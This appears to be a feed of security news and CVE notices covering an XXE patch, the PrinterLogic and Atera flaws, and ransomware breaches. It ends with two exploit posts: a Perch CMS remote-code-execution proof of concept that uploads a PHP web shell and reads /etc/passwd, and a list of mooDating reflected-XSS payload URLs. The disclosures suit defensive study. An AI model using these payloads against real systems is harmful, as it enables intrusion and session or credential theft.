Applicant Programme Ver.7.06 and earlier improperly restricts XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker.

**申請人プログラム及び申請データ仕様書等について（動産・債権譲渡登記）****１　申請人プログラム及び操作説明書**

１　申請人プログラム  
　　申請人プログラムについては、次をクリックしてダウンロードしてください。  
　　■　申請人プログラム　Ver.7.07 （※ 動作保証環境：Windows10 64bit ）  
　　　　※推奨ブラウザは、Microsoft Edge 又は Google Chrome です。  
　　　 　　　これら以外のブラウザを使用した場合には、画面が一部正しく表示されない等の事象が発生する可能性があります。

２　申請人プログラム操作説明書  
　　申請人プログラムの操作説明書については、次をクリックしてください。  
　　■　申請人プログラム操作説明書（動産譲渡登記編）（令和５年７月）【ＰＤＦ】  
　　■　申請人プログラム操作説明書（債権譲渡登記編）（令和５年７月）【ＰＤＦ】

**２　申請データ仕様****３　事前提供方式の概要**

事前提供方式の概要については、次をクリックしてください。

 ■　事前提供方式の概要【ＰＤＦ】  

**４　お知らせ**

■　令和５年７月２４日  
　　　申請人プログラムにおいてＸＭＬ外部実体参照 （ＸＸＥ） に関する脆弱性（ＣＷＥ－６１１）が発見されたため、令和５年７月２４日（月）に「申請人プログラムVer7.07」を公開しました。御利用の申請人プログラムのバージョンが7.07以降のものになっている場合には、脆弱性対応が完了しています。  
　　　まだ最新のバージョンへの更新がお済みでない方は、最新のソフトウェアを入手し、更新作業を行ってください。

PDF形式のファイルをご覧いただく場合には、Adobe Readerが必要です。  
Adobe Readerをお持ちでない方は、バナーのリンク先から無料ダウンロードしてください。  
リンク先のサイトはAdobe Systems社が運営しています。

※上記プラグインダウンロードのリンク先は2015年4月時点のものです。

CVE-2023-32639: 法務省：申請人プログラム及び申請データ仕様書等について（動産・債権譲渡登記）

Categories: News
Categories: Personal
Tags: parents

Tags:  cybersecurity

Tags:  chromebook

Tags:  auto updates

Tags:  urgent notifications

Tags:  remote desktop

Tags:  router

Tags:  block list

Tags:  encryption

Here are some tips that you can use to set up a secure environment for your parents' digital needs.



(Read more...)




The post How to set up computer security for your parents appeared first on Malwarebytes Labs.

If you want to tighten up your parents' home cybersecurity as much as possible, you've come to the right place. After all, you’re no doubt the family IT person, and first point of contact if trouble arises. 

**Consider a Chromebook.** If someone is looking for a new computer system for regular, non-demanding purposes, such as browsing, social media, and email, you can help with recommendations. For such a person, who isn't invested in heavy gaming, a Chromebook would be a good option, as it will save them some money and can perform all those functions, plus allows them to play browser-based games if needed.

**Turn on auto-update.** Installing software on a system usually comes with the task of having to keep it up-to-date. Therefore, any software program, operating system or browser that has an option to auto-update should be set to do this. We know this isn’t always recommended in a work environment, but for the computer illiterate person in their own home, it’s perfect. One less thing to worry about.

**Configure their security software.**  In addition, selecting security software that allows users to minimize notifications to only dire warnings will keep users from getting confused. Notifications coming from programs can have strange effects on the less computer savvy for several reasons:

*   They don’t understand to which program the messages belong, which takes away the context for them
*   The text in the notifications is designed to be short, which means they’re not always maximized for clarity
*   Technical terms used in the notification may be unfamiliar

When there are too many notifications, people can get fatigued. Most will simply want the pop-ups to disappear, no matter what they have to click on to accomplish this. So, any software that can be set to only issue a warning when something is really amiss deserves a big plus.

**Disabled Remote Desktop.** If you’re dealing with a Windows computer, disable Remote Desktop. Remote Desktop is sometimes used by scammers in things like technical support scams, so if you don't need it you may as well turn it off. You can do this in Settings. Here's how to do it in Windows 10:

*   Launch the **Settings** app. (shortcut **Win + I**)
*   Under the System **section**, scroll down and click on the Remote Desktop **option**.
*   Then, click on the toggle next to the Remote Desktop option to turn it off.

*   Windows will prompt you to confirm your decision.
*   Click on the Disable button and exit the settings app.

**Use an easy to maintain blocklist or firewall.** This can keep a lot of harm at bay. Alternatively, make use of security software that includes a web protection module, like Malwarebytes Premium.

**Configure the router accordingly.** Make sure to configure the home router and access points with unique usernames and passwords and do not use the default ones that come with the equipment. Many botnets will attempt to take over such devices by trying default credentials.

There are some other basic settings that can enhance the security of the home router without hindering the users:

*   Turn off remote management if enabled.
*   Use WPA2 or WPA3 (if available) encryption on Wireless routers.

**Hang up, close the tab, and call your bank.** A Dutch bank ran a very effective campaign that advised customers to “Hang up, close the tab, and call your bank.” This is very easy to remember and very effective at the same time. Tell your parents to remember that phrase when they see “urgent” warnings online or get cold calls from Microsoft, their bank, or any other entity that seeks access to personal or financial information. It’s good to teach your parents they shouldn’t trust that friendly voice with a concerned tone, if they can’t verify their identity. The same is true for text and chat messages. Even if the sender claims to be you on your new phone.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

How to set up computer security for your parents

An issue was discovered in Vasion PrinterLogic Client for Windows before 25.0.0.836. During client installation and repair, a PrinterLogic binary is called by the installer to configure the device. This window is not hidden, and is running with elevated privileges. A standard user can break out of this window, obtaining a full SYSTEM command prompt window. This results in complete compromise via arbitrary SYSTEM code execution (elevation of privileges).

Windows Build 25.0.0.930 - 7/6/23

*   An issue where the Windows Client sent print job info with a blank user when checking quota was resolved. - PI-50558
    
*   An issue causing the change not to be recognized when changing between uppercase/lowercase letters in the SNMP community name on the Port tab of a printer object has been resolved. - PI-47932
    

Windows Build 25.0.0.896 - 5/2/23

*   An issue with Quota Management causing an LDAP user to not be identified correctly when IdP was disabled has been resolved. This was allowing end-users to print to a secure printer when they were over their set quota. - PI-42942
    

Windows Build 25.0.0.888 - 4/5/23

*   An issue when performing a migration that was causing print mappings to not convert printers to Direct-IP has been resolved. - PI-43675
    

Windows Build 25.0.0.882 - 3/29/23

*   An issue that was causing some customers to experience extreme increases in traffic during off hours, and would sometimes cause users to receive an error message about the client service being unavailable when they try to install a printer from the self-service portal has been resolved. - PI-47379
    
*   An issue where non lower case home urls were causing off network jobs to fail with a 400 message has been resolved. - PI-47505
    

Windows Build 25.0.0.874 - 3/14/23

*   An issue when updating the service manager that caused it to stop functioning, which then caused all services to stop, has been resolved. - PI-47191
    

Windows Build 25.0.0.870 - 3/9/23

*   An issue when using Off-Network Printing with Direct IP Primary set, causing printing to a pull printer to time out and cause a delay has been resolved. - PI-46573
    

Windows Build 25.0.0.864 - 2/24/23

*   Corrected an issue with Off-Network Printing IdP authentication that was causing the print job to never reach the Internal Routing Service. - PI-46715
    

Windows Build 25.0.0.857 - 2/16/23

*   An issue causing the IDP authentication app to not update correctly causing IDP logins to fail has been resolved. - PI-46048
    
*   Added improvements for the clients ability to remember/restore end-user default printers in non-persistent virtualized environments. - PI-46167
    

Windows Build 25.0.0.836 - 2/10/23

*   Minor update to custom actions in MSI installer. PI-46396
    
*   An issue causing document page counts to be multiplied by two, causing inaccurate total page counts has been resolved. - PI-43972
    

Windows Build 25.0.0.827 - 2/2/23

*   Minor security fixes.
    
*   Corrected an issue where IDP information was not associated with print stats from held/released print jobs.
    
*   Corrected a label where windows 11 machines would show as windows 10 in the logs.
    

Windows Build 25.0.0.810 - 1/19/23

*   An issue when logging into an IdP using a username containing an apostrophe causing the login to fail has been resolved. - PI-44304
*   An issue when using Off-Network Printing with a self-hosted gateway causing print jobs to fail has been resolved. - PI-43523
*   An issue when using ONP printing to a pull printer without having a release printer installed causing the print job to fail has been resolved. - PI-44448

Windows Build 25.0.0.796 - 1/3/23

*   An issue when using Printer names with the "&" character causing issues with refreshing configurations and profile changes has been resolved. - PI-37851
*   An issue when using printer names with special character "é" causing the printer to not install has been resolved. - PI-42034
*   An issue with the automatic client update not working when item level targeting is applied has been resolved. - PI-41825

Windows Build 25.0.0.788 - 12/15/22

*   An issue for some users in some environments, that they would appear to successfully log in to the client with IDP, but it would not show that they are logged in has been resolved. - PI-44946
    

Windows Build 25.0.0.786 - 12/9/22

*   An issue causing the client to lose authentication when switching between home URLs has been resolved. - PI-44156
    
*   An issue when using a virtual environment, causing the Windows client to not check in causing end-users to be unable to install printers has been resolved. - PI-43420
    

Windows Build 25.0.0.772 - 11/24/22

*   Corrected an issue where occasionally a remote session into a VM will report the incorrect IP address for the end-point connection.. - PI-28416
    

Windows Build 25.0.0.769 - 11/15/22

*   Corrected an issue that was caused if the Client was installed using a command prompt but choosing not to also install the extension. If later deciding to manually install the extension, the extension was not working properly. - PI-43690
    

Windows Build 25.0.0.765 - 11/11/22

*   Corrected an issue where sometimes clients would require reauthorization after visiting the self-service portal.
    
    For existing workstations experiencing this issue, you will need to clear the 'classes' registry key and reauthorize the client. This can be done by uninstalling the client and reinstalling with an auth code on the command line, or manually typing in an auth code when prompted. - PI-42687
    

Windows Build 25.0.0.756 - 10/29/22

*   Added a client override to handle a specific condition where Chromebooks are connecting to a Windows server (RDS or VDI) that allows the 'hostname' detected in the virtual session to be treated as an AssetID or a Serial number or both. This override will assist with deployments. - PI-41633

Windows Build 25.0.0.751 - 10/26/22

*   Corrected an issue where a performance mechanism was incorrectly reducing the responsiveness of release messages. - PI-43285
*   Corrected an issue where the PJ monitor thread was being stopped and started repeatedly. - PI-28046

Windows Build 25.0.0.727

*   Updates were made to give the ability to turn off automatic browser extension installation when updating/installing the client. Information on parameters to control this can be found on the Install Client on Windows documentation. - PI-36841

Windows Build 25.0.0.715

*   Several updates were made to resolve issues when running in RDS mode. - PI-40969
    *   Resolved an issue with being unable to create printers or set default printers in RDS mode.
    *   Resolved an issue when a service client was running on an RDS server, it would attempt to run a Service Client in every session.
*   Corrected several minor performance issues.

Windows Build 25.0.0.704

*   An issue causing the need to reinstall an authorization code at random has been resolved. - PI-39384
*   When in RDS mode, an issue causing the SNMP monitor process to start in each user session has been resolved. - PI-40726
*   A request to remove the "Refreshing Client" message when a client refresh occurs has been completed. - PI-39388

Windows Build 25.0.0.673

*   An issue causing the service manager to not start when installing a fresh client has been resolved. - PI-39002
*   An issue causing printers to be removed from Self-service Portal when a login to the Admin Console is performed on the same browser session has been resolved. - PI-18993

Windows Build 25.0.0.672

*   An issue causing a prompt to reinstall the edge extension when launching a published app in Citrix TS session has been resolved. - PI-36973
*   An issue causing the desktop client login screen to open in two browser windows has been resolved. - PI-34725
*   An issue causing a buildup of npPrinterInstallerClientPlugin32.exe processes has been resolved. - PI-38371
*   An issue when in a Citrix environment in RDS mode to identify held print jobs as the domain user attribute instead of the IdP user attribute has been resolved. - PI-36944
*   An issue when using Citrix in RDS mode causing printers from previous sessions to still be visible when previously removed has been resolved. - PI-36436

Windows Build 25.0.0.603

*   An issue causing stress to the web server when a large number of clients come online at once has been resolved.
*   Added ability to deploy printers based on MAC address of thin clients in VDI environment.

Windows Build 25.0.0.590

*   An issue causing RDS mode to not be reinforced has been resolved. - PI-36436
*   Udates to assist with PIV/CAC users were implemented.
*   An issue causing the Edge extension to not work after an update to a new client has been resolved. - PI-32790

Windows Build 25.0.0.540

*   An issue causing the portal pages to not load when using IE 11 has been resolved. - PI-31743
*   In issue causing an error when upgrading the client has been resolved. - PI-31021
*   An error causing the wrong address to be returned from the registry has been resolved. - PI-30213
*   An issue causing secure release print jobs with Chinese characters in the title to not release has been resolved. - PI-30213

CVE-2023-32232: Client Release Notes

REDCap 12.0.26 LTS and 12.3.2 Standard allows SQL Injection via scheduling, repeatforms, purpose, app_title, or randomization.

CVE-2023-37361: Trustwave Security Advisories

Categories: News
Categories: Ransomware
Tags: Tampa

Tags:  General Hospital

Tags:  Snatch

Tags:  ransomware

Tags:  RDP

Tags:  data breach

The Tampa General Hospital has promised to reach out to the individuals whose information has been stolen by the Snatch ransomware group.



(Read more...)




The post Tampa General Hospital half thwarts ransomware attack, but still loses patient data appeared first on Malwarebytes Labs.

The Tampa General Hospital (TGH) has promised to reach out to individuals whose information has been stolen by a ransomware group.

In a cybersecurity notice, TGH said it noticed unusual activity on its computer systems on May 31, 2023.

> “Fortunately, TGH’s monitoring systems and experienced technology professionals effectively prevented encryption, which would have significantly interrupted the hospital’s ability to provide care for patients.”

While that is good news from a healthcare perspective, the ransomware operators did obtain something of value. An investigation learned that an unauthorized third party accessed TGH’s network and obtained files from its systems between May 12 and May 30, 2023.

Further investigation showed that some patient information was included. The information varied from person to person, but may have included names, addresses, phone numbers, dates of birth, Social Security numbers (SSNs), health insurance information, medical record numbers, patient account numbers, dates of service and/or limited treatment information used by TGH for its business operations.

According to TGH, the criminals did not access the hospital's electronic medical record system.

TGH says it is mailing letters to individuals whose information may have been compromised, and will provide complimentary credit monitoring and identity theft protection services to those whose Social Security numbers were accessed.

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   Check the vendor's advice. Every breach is different, so check with the vendor to find out what's happened, and follow any specific advice they offer.
*   Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don't use for anything else. Better yet, let a password manager choose one for you.
*   Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify any contacts using a different communication channel.
*   Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.

**Snatch ransomware**

On July 18, 2023, Snatch ransomware group claimed responsibility for the data theft on its leak site.

At Malwarebytes, we've been tracking the Snatch group since 2019. The group is suspected to operate from Russia. Back in 2019, the group stood out because it deployed a somewhat new technique for ransomware which forced the affected machine to reboot into safe mode without networking. Safe mode starts Windows in a basic state, using a limited set of files and drivers. It’s intended for troubleshooting, but since many monitoring tools will not work in safe mode, it allowed for an undisturbed and quicker encryption process. By choosing the “without networking” mode, administrators lose view of the system. The Snatch ransomware added itself as a service which ran in safe mode. Interestingly, for some reason the group no longer uses that method.

Their most common attack vectors include brute-force attacks against vulnerable, exposed services such as RDP, VNC (Virtual Network Computing), and TeamViewer. Programmed in Go, the ransomware component is separate from the data stealer. We have not seen the multi-platform capabilities of Go put to use, and only Windows machines are affected.

Malwarebytes detects the Snatch ransomware as Ransom.Snatch.

**How to avoid ransomware**

*   **Block common forms of entry.** Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
*   **Prevent intrusions.** Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
*   **Detect intrusions.** Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption.** Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
*   **Create offsite, offline backups.** Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Don’t get attacked twice.** Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes EDR and MDR remove all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Tampa General Hospital half thwarts ransomware attack, but still loses patient data

By Deeba Ahmed
The Cl0p Ransomware Gang has begun its clearweb journey by leaking data stolen from PWC.com.
This is a post from HackRead.com Read the original post: Cl0p Ransomware Gang Leaks MOVEit Data on Clearweb Sites

At the time of writing, the clearweb domain of the Cl0p Ransomware Gang was offline; however, the gang’s entry to the clearweb reveals upcoming cybersecurity threats intended for their victims.

The Cl0p ransomware gang is among the cybercrime syndicates that have exploited the MOVEit vulnerability more extensively than any other. To exacerbate the situation, the ransomware gang is now leaking the data it stole through the MOVEit vulnerability on its clearweb domain.

According to security researcher Dominic Alvieri, the Cl0p ransomware gang is leaking the data they stole from the MOVEit Transfer platform in May on the publicly accessible website. The gang exploited a zero-day vulnerability in the secure file transfer platform, leading to a data breach that drastically impacted hundreds of businesses and government institutions worldwide. 

Cl0p has dumped the data as large downloadable files instead of opting for specific searchable items and didn’t host the site on the Tor network, as has been the case in many previous data leaks.

Screenshot from Cl0p’s dark web domain (Image credit: Hackread.com)

**What is the difference between Clearweb and Dark Web**

The Clearweb, also known as the Surface Web or Visible Web, refers to the part of the internet that is easily accessible and indexed by search engines like Google. It includes websites and web pages that can be accessed through standard web browsers without requiring any special configurations.

On the other hand, the Dark Web is a portion of the internet that is intentionally hidden and not indexed by traditional search engines. Accessing the Dark Web requires specialized software, such as the Tor browser, which provides anonymity and encryption.

This anonymity allows users to access hidden websites that use “.onion” domains. The Dark Web is often associated with illicit activities, illegal marketplaces, and anonymous forums where users can communicate without revealing their identities.

It is worth noting that Cl0p has recently developed this tactic to blackmail their victims where the gang creates Clearnet websites hosted on the surface web to leak stolen data. They first tried this tactic to leak data stolen from the PWC business consulting firm, which was uploaded in four spanned ZIP archives. Later Cl0p used the same tactic for leaking data from TD Ameritrade, Aon, Kirkland, and Ernest & Young.

Screenshot from Cl0p’s clearweb domain (Image credit: Hackread.com)

Perhaps, the Cl0p ransomware gang believes it to be a more effective method for extorting victims (even though such websites get quickly removed). Leaking data on Tor-hosted darknet platforms has lost the charm given their restricted reach.

Although Tor offers anonymity, not all users can access the sites without a specialized browser, whereas, on the surface web, anyone having the website link can download the stolen data.

Another reason is that search engines don’t index darknet content, so, download speed is usually pretty slow, whereas, on Clearweb, the site gets indexed, and downloading is quicker. Nonetheless, this tactic is more detrimental for the victims as they become vulnerable to harassment and online scams from all fronts.

Cl0p is among the most notorious hacking gangs currently having successfully targeted high-profile firms and extracted millions of dollars in ransom. Per Coveware’s latest report, the gang has raked in $75-$100 million from their latest MOVEit attacks. Coveware CEO Bill Siegel noted that only a handful of Cl0p’s victims generally give in to their demands.

Therefore, the hackers are using different extortion strategies. Siegel also noted that MOVEit attacks have proven far more successful than GoAnywhere data theft, where the hackers could breach 130 victims and didn’t receive their desired ransom as well.

As expected, all Clearweb extortion sites created by the Cl0p ransomware gang have been taken offline, proving the short-lived nature of this method. Security researchers highlighted that Cl0p’s latest site lacks the sophistication seen in the approach used by the rival ALPHV ransomware gang, aka BlackCat, which introduced this method to pressurize their victims more profoundly.

**RELATED ARTICLES**

1.  Big Head Ransomware Found in Fake Windows Updates
2.  LockBit Ransomware Expands Attack Spectrum to Mac Devices
3.  Genesis Market’s Clearnet domain seized; Dark Web site still online

Cl0p Ransomware Gang Leaks MOVEit Data on Clearweb Sites

Atera Agent through 1.8.3.6 on Windows Creates a Temporary File in a Directory with Insecure Permissions.

Skip to content

Sign up

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    Explore
    
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   For
    
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    By Solution
    
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    Resources
    
    *   Customer Stories
    *   White papers, Ebooks, Webinars
    *   Partners
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    Repositories
    
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

We read every piece of feedback, and take your input very seriously.

Include my email address so I can be contacted

**Saved searches****Use saved searches to filter your results more quickly**

Sign in

Sign up

mandiant / **Vulnerability-Disclosures** Public

*   Notifications
*   Fork 51
*   Star 146
    

146 stars 51 forks Activity

Star

Notifications

*   Code
*   Issues 3
*   Pull requests
*   Actions
*   Projects
*   Security
*   Insights

More

master

Switch branches/tags

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Clone
    
    Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

Aaron Carreras Add Atera CVE-2023-26077 and CVE-2023-26078 for Andrew Oliveau.

79876c5

Jul 24, 2023

Add Atera CVE-2023-26077 and CVE-2023-26078 for Andrew Oliveau.

79876c5

**Git stats**

*   **134** commits

**Files**Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

2022

2023

FEYE-2019-0001

FEYE-2019-0002

FEYE-2019-0003

FEYE-2019-0004

FEYE-2019-0005

FEYE-2019-0006

FEYE-2019-0007

FEYE-2019-0008

FEYE-2019-0009

FEYE-2019-0010

FEYE-2019-0011

FEYE-2019-0012

FEYE-2019-0013

FEYE-2019-0014

FEYE-2019-0015

FEYE-2020-0001

FEYE-2020-0002

FEYE-2020-0003

FEYE-2020-0004

FEYE-2020-0005

FEYE-2020-0006

FEYE-2020-0007

FEYE-2020-0008

FEYE-2020-0009

FEYE-2020-0010

FEYE-2020-0011

FEYE-2020-0012

FEYE-2020-0013

FEYE-2020-0014

FEYE-2020-0015

FEYE-2020-0016

FEYE-2020-0017

FEYE-2020-0018

FEYE-2020-0019

FEYE-2020-0020

FEYE-2021-0001

FEYE-2021-0002

FEYE-2021-0003

FEYE-2021-0004

FEYE-2021-0005

FEYE-2021-0006

FEYE-2021-0007

FEYE-2021-0008

FEYE-2021-0009

FEYE-2021-0010

FEYE-2021-0011

FEYE-2021-0012

FEYE-2021-0013

FEYE-2021-0014

FEYE-2021-0015

FEYE-2021-0016

FEYE-2021-0017

FEYE-2021-0018

FEYE-2021-0019

FEYE-2021-0020

FEYE-2021-0021

FEYE-2021-0022

FEYE-2021-0023

FEYE-2021-0024

FEYE-2021-0025

MNDT-2021-0001

MNDT-2021-0002

MNDT-2021-0003

MNDT-2021-0004

MNDT-2021-0005

MNDT-2021-0006

MNDT-2021-0007

MNDT-2021-0008

MNDT-2021-0009

MNDT-2021-0010

MNDT-2021-0011

MNDT-2021-0012

README.md

**README.md**

**Mandiant Vulnerability Disclosures**

This repository details vulnerabilities disclosed by Mandiant. These vulnerabilities were discovered by internal research, through Red Team assessments, or in use in the wild. Proof of concepts (PoCs) may or may not be provided.

The following _licenses/licensing_ apply to this Mandiant repository:

1.  CC BY-SA 4.0 - For CVE related information not including source code (such as PoCs)
2.  MIT - For source code contained within provided CVE information

Mandiant coordinates and handles Vulnerability Disclosures in accordance with Google's Vulnerability Disclosure Policy.

**About**

No description, website, or topics provided.

**Resources**

Readme

Activity

**Stars**

**146** stars

**Watchers**

**26** watching

**Forks**

**51** forks

Report repository

**Releases**

No releases published

**Packages**

No packages published  

**Contributors 4**

*    **RonnieSalomonsen** Ronnie Salomonsen
*    **aaronc100** Aaron Carreras
*    **attritionorg** Jericho
*    **ziadhany** ziad hany

**Languages**

*   C++ 100.0%

CVE-2023-26077: GitHub - mandiant/Vulnerability-Disclosures

Privilege escalation vulnerability was discovered in Atera Agent 1.8.4.4 and prior on Windows due to mishandling of privileged APIs.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-26078: Vulnerability-Disclosures/2023/MNDT-2023-0009.md at master · mandiant/Vulnerability-Disclosures

Perch version 3.2 suffers from a remote code execution vulnerability.

    Exploit Title: Perch v3.2 - Remote Code Execution (RCE)Application: Perch CmsVersion: v3.2Bugs:  RCETechnology: PHPVendor URL: https://grabaperch.com/Software Link: https://grabaperch.com/downloadDate of found: 21.07.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1. login to account as admin2. go to visit assets (http://localhost/perch_v3.2/perch/core/apps/assets/)3. add assets (http://localhost/perch_v3.2/perch/core/apps/assets/edit/)4. upload poc.phar filepoc.phar file contents :<?php $a=$_GET['code']; echo system($a);?>5. visit  http://localhost/perch_v3.2/perch/resources/admin/poc.phar?code=cat%20/etc/passwdpoc request: POST /perch_v3.2/perch/core/apps/assets/edit/ HTTP/1.1Host: localhostContent-Length: 1071Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryYGoerZn09hHSjd4ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/perch_v3.2/perch/core/apps/assets/edit/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: phpwcmsBELang=en; cmsa=1; PHPSESSID=689rdj63voor49dcfm9rdpolc9Connection: close------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="resourceTitle"test------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="image"; filename="poc.phar"Content-Type: application/octet-stream<?php $a=$_GET['code']; echo system($a);?>------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="image_field"1------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="image_assetID"------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="resourceBucket"admin------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="tags"test------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="btnsubmit"Submit------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="formaction"edit------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="token"5494af3e8dbe5ac399ca7f12219cfe82------WebKitFormBoundaryYGoerZn09hHSjd4Z--

Perch 3.2 Remote Code Execution

mooDating version 1.2 suffers from a cross site scripting vulnerability.

# Exploit Title: mooDating 1.2 - Reflected XSS  
# Exploit Author: CraCkEr aka (skalvin)  
# Date: 22/07/2023  
# Vendor: mooSocial  
# Vendor Homepage: https://moodatingscript.com/  
# Software Link: https://demo.moodatingscript.com/home  
# Tested on: Windows 10 Pro  
# Impact: Manipulate the content of the site  
# CVE: CVE-2023-3849 - CVE-2023-3848 - CVE-2023-3847 - CVE-2023-3846  
       CVE-2023-3843 - CVE-2023-3845 - CVE-2023-3844

## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka    
CryptoJob (Twitter) twitter.com/0x0CryptoJob

## Description

The attacker can send to victim a link containing a malicious URL in an email or instant message  
can perform a wide variety of actions, such as stealing the victim's session token or login credentials

Path: /matchmakings/question

URL parameter is vulnerable to RXSS

https://website/matchmakings/questiontmili%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ew71ch?number=  
https://website/matchmakings/question[XSS]?number=

Path: /friends

URL parameter is vulnerable to RXSS

https://website/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3er5c3m/ajax_invite?mode=model  
https://website/friends[XSS]/ajax_invite?mode=model

Path: /friends/ajax_invite

URL parameter is vulnerable to RXSS

https://website/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ef26v4?mode=model  
https://website/friends/ajax_invite[XSS]?mode=model

Path: /pages

URL parameter is vulnerable to RXSS

https://website/pagesi3efi%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ebdk84/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l  
https://website/pages[XSS]/no-permission-role?access_token&=redirect_url=aHR0cHM6Ly9kZW1vLm1vb2RhdGluZ3NjcmlwdC5jb20vbWVldF9tZS9pbmRleC9tZWV0X21l

Path: /users

URL parameter is vulnerable to RXSS

https://website/userszzjpp%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3eaycfc/view/108?tab=activity  
https://website/user[XSS]/view/108?tab=activity

Path: /users/view

URL parameter is vulnerable to RXSS

https://website/users/viewi1omd%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3el43yn/108?tab=activity  
https://website/users/view[XSS]/108?tab=activity

Path: /find-a-match

URL parameter is vulnerable to RXSS

https://website/find-a-matchpksyk%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3es9a64?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0  
https://website/find-a-match[XSS]?session_popularity=&interest=0&show_search_form=1&gender=2&from_age=18&to_age=45&country_id=1&state_id=5&city_id=&advanced=0

[XSS Payload]: pksyk"><img src=a onerror=alert(1)>s9a6

[-] Done

Tag

#windows